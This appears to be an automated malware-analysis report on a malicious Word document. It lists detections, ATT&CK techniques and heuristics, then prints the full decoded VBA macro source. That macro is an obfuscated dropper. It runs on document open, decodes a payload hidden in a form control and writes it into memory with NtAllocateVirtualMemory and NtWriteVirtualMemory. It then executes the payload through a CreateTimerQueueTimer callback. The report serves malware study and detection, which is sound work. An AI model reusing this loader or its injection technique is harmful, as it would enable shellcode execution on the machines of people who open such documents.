Verdict: MALICIOUS
Risk Score: 110
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains a VBA macro in the Document_Open subroutine, a common technique for initial execution. The macro is obfuscated and declares 'NtAllocateVirtualMemory' through a PtrSafe Declare statement, suggesting that it allocates memory for a payload and then executes it. The ClamAV detection 'Doc.Dropper.Agent-6436876-0' further supports its classification as a dropper. The document body content is benign, indicating that the malicious functionality resides solely in the macro.
Heuristics (5)
- ClamAV: Doc.Dropper.Agent-6436876-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6436876-0
- NOP-equivalent sled detected (medium, SC_NOP_EQUIV_SLED): Long run of 0x40 bytes
  Disassembly: attempted x86 opcode disassembly of the 0x40 run (instruction listing omitted)
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched lines in script:
  Private Sub Document_Open()
  chopper = "hercules"
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11273 bytes |
SHA-256 of macros.bas: e740c6c0b23fdb8b8d88ff84528db326cb672df0d8c0ac6f6568ec828b07087a
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
chopper = "hercules"
bedding
reclusion = 28 + 10
Pmt 0, reclusion, 20522, 59196, 2
End Sub
Attribute VB_Name = "dimocarpus"
Attribute VB_Base = "0{3608F65F-2715-4212-85E5-29E34707BB97}{5FFAB0FC-1943-4D49-BD5C-D494ACC8D692}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "confining"
#If (62 - 27 + 365 + 83 - 56 + 273) > ((87 - 34 + 267) - (11 - 42 + 571) * 1) And ((21 - 24 + 31) - (73 - 111 + 66)) * 2 < (Win64) Then
Public Declare PtrSafe Function prelacy _
Lib "ntdll " Alias _
"NtAllocateVirtualMemory" (copper As LongPtr, aether As LongPtr, ByVal chamaeleontidae As LongPtr, catByVal As LongPtr, ruptiliocarpon As LongPtr, ByVal argali As LongPtr) As LongPtr
#End If
Function manta(almost) As String
Dim ifla(63) As Long
Dim fossils As Long
Dim absolver As Long
Dim bromelia() As Byte
Dim exhibitionism As Long
Dim beaugregory As Long
Dim antihypertensive(63) As Long
Dim supplant As String
Dim approximative(63) As Long
Dim ungoverned(6962) As Byte
gradient = 30 - 10 + 4012
Dim annals As Long
scion = 78 - 93 + 65295
gangster = 27 - 24 + 253
introject = 71 - 76 + 69
Dim panini As Variant
bedside = 31 - 74 + 16711723
oberon = 123 - 107 + 16515056
autobiography = 101 - 36 + 257983
Dim barbiturate As Integer
hamiform = 13 - 41 + 4124
drippy = 44 - 51 + 262151
outlier = 49 - 111 + 317
flinch = 14 - 70 + 65592
cagily = 113 - 22 - 28
Dim copartner As Integer
futon = 8 - 49 + 7884
Dim mf() As Byte
mf = VBA.StrConv(almost, 120 + 8)
importer = 45 + 7
Pmt 0, importer, 25416, 25449, 7
affect = 7840 + 3
moneymaking = vbKeyShift - 12
For chordal = 0 To affect
If chordal Mod 2 = 0 Then
mf(chordal) = mf(chordal) - moneymaking
Else
mf(chordal) = mf(chordal) - (moneymaking - 1)
End If
Next chordal
boswellia = 58 + 16
Pmt 0, boswellia, 33800, 37708, 7
indulgency = unrestraint
For fossils = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
approximative(fossils) = admired(fossils, introject, 61)
antihypertensive(fossils) = admired(fossils, hamiform, 61)
ifla(fossils) = admired(fossils, drippy, 61)
Next fossils
salleamanger = 28 + 4
Pmt 0, salleamanger, 37442, 33315, 3
bromelia = mf
appeasable = 74 - 4 - 66
celiocentesis = 35 + 6
Pmt 0, celiocentesis, 32953, 31463, 7
expectable = 61 - 55 - 3
attendance = expectable + 1
bentley = 74 - 47 - 25
For absolver = 0 To affect
urnam = bromelia(absolver)
torah = bromelia(absolver + 2)
hold = antihypertensive(indulgency(bromelia(absolver + 1)))
namibian = approximative(indulgency(torah)) + indulgency(bromelia(absolver + expectable))
exhibitionism = ifla(indulgency(urnam)) + hold + namibian
fossils = admired(exhibitionism, bedside, 53)
ungoverned(beaugregory) = admired(fossils, flinch, 43)
fossils = admired(exhibitionism, scion, 53)
ungoverned(beaugregory + 1) = admired(fossils, gangster, 43)
ungoverned(beaugregory + bentley) = admired(exhibitionism, outlier, 53)
beaugregory = beaugregory + bentley + 1
absolver = absolver + 3
Next
manta = ungoverned
End Function
Attribute VB_Name = "dominis"
#If (2 - 59 + 457 + 82 - 79 + 297) > ((59 - 32 + 293) - (79 - 22 + 483) * 1) And Not ((47 - 59 + 40) - (75 - 44 - 3)) * 2 < (Win64) Then
Public Declare Function gaucherie _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (soil As Any, ByVal calomel As Any, ByVal botany As Any, ByVal groundfish As Any, ByVal conserve As Any, ByVal euphoric As Any, ByVal catamaran As Any) As Long
#End If
#If (62 - 27 + 365 + 83 - 56 + 273) > ((87 - 34 + 267) - (11 - 42 + 571) * 1) And ((21 - 24 + 31) - (73 - 111 + 66)) * 2 < (Win64) Then
Public Declare PtrSafe Function gaucherie _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (odd As Any, ByVal rhoeadales As Any, ByVal gradeconstructed As Any, ByVal consumere As Any, ByVal naprapath As Any, ByVal aust As Any, ByVal acarina As Any) As Long
#End If
Function reposit(tempera, bearings, agriculturist)
Dim accidents As Long
Dim electronically As Integer
Dim desolately As Long
Dim separately As Integer
Dim coyly As Long
Dim unapparent As String
Dim ever As Long
Dim despitefully As Variant
Dim crenate As Long
Dim inaffable As String
Dim gharrywallah As Variant
dogtooth = dogtooth
dogtooth = costa
accidents = tempera
crenate = agriculturist
dogtooth = dogtooth
coyly = bearings
feast = 55 + 55
Pmt 0, feast, 26368, 10482, 5
foyer = Rnd(174)
desolately = 9 - 118 + 108
mercies ByVal desolately, _
accidents, coyly, _
crenate, ever
convertible = bracing + 121
End Function
Attribute VB_Name = "fixut"
#If (62 - 27 + 365 + 83 - 56 + 273) > ((87 - 34 + 267) - (11 - 42 + 571) * 1) And ((21 - 24 + 31) - (73 - 111 + 66)) * 2 < (Win64) Then
Public Declare PtrSafe Function mercies _
Lib "ntdll " Alias _
"NtWriteVirtualMemory" (ByVal alephnull As Any, ByVal alloyed As Any, ByVal bloom As Any, ByVal marker As Any, ByVal attenuated As Any) As LongPtr
#End If
Function admired(whimsicality, antigua, nulli)
If nulli = 43 + (10 / 2 - 5) Then
admired = whimsicality \ antigua
End If
If nulli = 53 + (5 - 3) / 2 - 1 Then
admired = whimsicality And antigua
End If
If nulli = 61 + (56 / 7 - 4 * 2) Then
admired = whimsicality * antigua
End If
End Function
Function nonsense(sequent, impact, dismantle)
Dim cofactor As Long
Dim kenyapithecus As Long
Dim maggior As LongPtr
Dim antacid As LongPtr
Dim odoriferous As LongPtr
Dim grid As Long
Dim magnetism As LongPtr
Dim monrovia As LongPtr
bracing = foyer And 408
dogtooth = dogtooth
antacid = sequent
monrovia = dismantle
convertible = convertible + 275
magnetism = impact
bootless = 3 + 60
Pmt 0, bootless, 19241, 16857, 4
dogtooth = dogtooth
maggior = 119 - 65 - 55
mercies ByVal maggior, _
antacid, magnetism, _
monrovia, odoriferous
costa = "appropinquation"
End Function
Function monism(ache)
Dim grnoematagr As Long
Dim amphibolite As Byte
Dim alteration As String
Dim cloudburst As Long
#If (119 - 44 + 325 + 42 - 114 + 372) > ((111 - 124 + 333) - (71 - 39 + 508) * 1) And ((41 - 34 + 21) - (72 - 33 - 11)) * 2 < (Win64) Then
Dim argument As Variant
Dim mindfulness As LongPtr
masaniello = 80 - 101 + 29
Dim anguilliformes As LongPtr
Dim wirehair As String
Dim caliver As Long
Dim uncomely As LongPtr
Dim belleslettres As Variant
emanate = VarPtr(mindfulness)
placoderm = nonsense(emanate, VarPtr(ache) + (62 - 20 - 34), masaniello)
#End If
#If (45 - 12 + 367 + 115 - 46 + 231) > ((44 - 56 + 332) - (126 - 53 + 467) * 1) And Not ((79 - 122 + 71) - (46 - 63 + 45)) * 2 < (Win64) Then
Dim mindfulness As Long
masaniello = 125 - 12 - 109
Dim anguilliformes As Long
Dim uncomely As Long
emanate = VarPtr(mindfulness)
placoderm = reposit(emanate, VarPtr(ache) + (91 - 2 - 81), masaniello)
#End If
groomed = 70 - 18 - 53
anguilliformes = 120 - 101 - 19
complaint = 22 - 108 + 86
uncomely = 61 - 91 + 10015
conditionally = 23 - 103 + 4176
fanon = 43 - 29 + 50
anthropology = prelacy(ByVal groomed, _
anguilliformes, ByVal complaint, uncomely, _
ByVal conditionally, ByVal fanon)
costa = dogtooth
dogtooth = "pilgarlic"
reposit anguilliformes, mindfulness, 67 - 89 + 5905
alarmism = 46 + 59
Pmt 0, alarmism, 3506, 33846, 5
monism = anguilliformes
End Function
Function bedding()
Dim gueridon As Variant
Dim nor As Variant
dimocarpus.cynocephalidae.Value = Day(#12/5/2013#)
varday = barrels = "jail"
aerobacter = allomorph
classicistic = "catchweed"
godship = heifer
dumfoundered = "omsk"
doubts = "prenticeship"
dastardly = involucre
Set metalepsis = dimocarpus.cynocephalidae.SelectedItem
adverb = 6 + 15
Pmt 0, adverb, 36937, 59909, 5
browbeaten = metalepsis.Name
nonpsychoactive = 23 - 121 + 7942
conciliation = Right(browbeaten, nonpsychoactive)
fogged = confining.manta(conciliation)
atkins = 31 + 54
Pmt 0, atkins, 30827, 16166, 5
leontocebus = "protrusive"
#If (76 - 18 + 342 + 45 - 33 + 288) > ((65 - 81 + 336) - (31 - 11 + 520) * 1) And ((32 - 72 + 68) - (36 - 60 + 52)) * 2 < (Win64) Then
Dim ladyinwaiting As String
Dim blastocyte As LongPtr
Dim hoax As LongPtr
Dim obediant As String
Dim stonechat As String
Dim fallaciousness As LongPtr
Dim demythologization As LongPtr
Dim render As LongPtr
abdominoscope = 8 - 42 + 2098
#ElseIf (106 - 90 + 384 + 3 - 46 + 343) > ((67 - 35 + 288) - (72 - 57 + 525) * 1) And Not ((95 - 75 + 8) - (114 - 21 - 65)) * 2 < (Win64) Then
Dim eileton As Variant
Dim hoax As Long
Dim signified As Long
Dim blastocyte As Long
Dim fallaciousness As Long
autoptical = 31 - 71 + 821
Dim demythologization As Long
Dim render As Long
abdominoscope = autoptical + 3459
#End If
diamondback = 94 - 116 + 22
thallophyte = "isotonic"
costal = 39 + 45
Pmt 0, costal, 11568, 42979, 3
venogram = "assistive"
seafood = "mpriser"
anothers = "marduk"
styrene = 36 + 39
Pmt 0, styrene, 33132, 35943, 4
etropus = fogged
chromatism = "broad"
blastocyte = monism(etropus)
abrasion = melancholic
efface = "macrobiotic"
Dim isospondyli As String
Dim postmeridian As Long
fallaciousness = 46 - 120 + 74
hoax = blastocyte + abdominoscope
demythologization = 30 - 82 + 201579
render = 37 - 106 + 3569
formonly = gaucherie(demythologization, _
fallaciousness, _
hoax, fallaciousness, _
fallaciousness, fallaciousness, _
fallaciousness)
dreary = 50 + 6
Pmt 0, dreary, 38704, 58330, 6
End Function
Attribute VB_Name = "mirtans"
#If (2 - 59 + 457 + 82 - 79 + 297) > ((59 - 32 + 293) - (79 - 22 + 483) * 1) And Not ((47 - 59 + 40) - (75 - 44 - 3)) * 2 < (Win64) Then
Public Declare Function prelacy _
Lib "ntdll " Alias _
"NtAllocateVirtualMemory" (pretrial As Long, canonist As Long, ByVal segnity As Long, narrowedByVal As Long, crowned As Long, ByVal absinthe As Long) As Long
Public Declare Function mercies _
Lib "ntdll " Alias _
"NtWriteVirtualMemory" (ByVal plonk As Any, ByVal adamant As Any, ByVal sanctorum As Any, ByVal developer As Any, ByVal dead As Any) As Long
#End If
Function unrestraint()
Dim subjecta(255) As Byte
frostbound = 31 - 37 + 71
For i = frostbound To (57 - 78 + 112)
subjecta(frostbound) = frostbound - (127 - 53 - 9)
frostbound = frostbound + 1
If athanor > (48 - 5 + 48) Then Exit For
Next
frostbound = (86 - 20 - 18)
For i = frostbound To (65 - 82 + 75)
subjecta(frostbound) = frostbound + (78 - 125 + 51)
frostbound = frostbound + 1
If athanor > (55 - 120 + 123) Then Exit For
Next
frostbound = (68 - 47 + 76)
For i = frostbound To (13 - 99 + 209)
subjecta(frostbound) = frostbound - (77 - 115 + 109)
frostbound = frostbound + 1
If athanor > (53 - 117 + 187) Then Exit For
Next
subjecta(87 - 123 + 83) = (48 - 9 + 24)
frostbound = (68 - 31 + 6)
subjecta(frostbound) = (109 - 94 + 47)
unrestraint = subjecta
End Function